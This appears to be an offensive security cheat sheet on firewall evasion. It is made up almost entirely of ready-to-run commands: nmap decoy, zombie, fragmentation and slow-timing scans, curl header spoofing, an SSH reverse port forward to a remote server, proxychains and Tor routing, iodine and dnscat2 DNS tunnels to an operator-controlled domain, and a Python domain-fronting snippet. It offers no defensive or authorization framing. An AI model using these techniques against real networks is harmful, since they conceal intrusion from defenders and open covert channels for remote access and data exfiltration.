Firewall Evasion

Bypassing network security controls and detection systems

Firewall Detection

Identifying Firewall Presence

# Nmap firewall detection nmap -sA target.com nmap -sF target.com nmap -sN target.com

# TTL manipulation nmap --ttl 64 target.com # Fragmentation nmap -f target.com nmap -ff target.com

# Decoy scanning nmap -D RND:10 target.com nmap -D decoy1,decoy2,decoy3,ME target.com

Traffic Obfuscation Techniques

Protocol Manipulation

# Source port manipulation nmap --source-port 53 target.com nmap --source-port 80 target.com # Zombie scan (idle scan) nmap -sI zombie-host target.com # FTP bounce scan nmap -b ftp-relay target.com

Timing Evasion

# Slow scanning nmap -T0 target.com # Paranoid nmap -T1 target.com # Sneaky # Custom timing nmap --scan-delay 5s target.com nmap --max-rate 50 target.com

Packet Fragmentation

# IPv4 fragmentation nmap -f target.com # Maximum fragmentation nmap --mtu 8 target.com # Custom MTU nmap --mtu 16 target.com

Application Layer Evasion

HTTP Evasion Techniques

# User-Agent manipulation curl -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" http://target.com

# Request method obfuscation curl -X OPTIONS http://target.com curl -X TRACE http://target.com # HTTP header manipulation curl -H "X-Forwarded-For: 127.0.0.1" http://target.com curl -H "X-Real-IP: 192.168.1.1" http://target.com

DNS Evasion

# DNS over HTTPS curl -H "accept: application/dns-json" "https://cloudflare-dns.com/dns-query?name=target.com&type=A"

# DNS over TLS dig @1.1.1.1 target.com +tls # Alternative DNS servers dig @8.8.8.8 target.com dig @1.1.1.1 target.com dig @208.67.222.222 target.com

Tunneling & Proxying

SSH Tunneling

# Local port forward ssh -L 8080:target.com:80 user@jump-server # Remote port forward ssh -R 4444:localhost:22 user@remote-server # Dynamic port forward (SOCKS proxy) ssh -D 1080 user@proxy-server

# Using proxychains with SSH tunnel echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf proxychains nmap -sT target.com

HTTP Proxying

# Manual proxy with curl curl --proxy http://proxy-server:8080 http://target.com # Tor proxy proxychains4 -f /etc/proxychains4.conf curl http://target.com

DNS Tunneling

# iodine DNS tunnel iodined -f -c -P password tunnel.yourdomain.com iodine -f -P password tunnel.yourdomain.com # dnscat2 ruby dnscat2.rb tunnel.yourdomain.com ./dnscat --dns server=tunnel.yourdomain.com

Advanced Evasion Techniques

Domain Fronting

import requests headers = { 'Host': 'forbidden-site.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } response = requests.get('https://allowed-cdn.com/api/endpoint', headers=headers)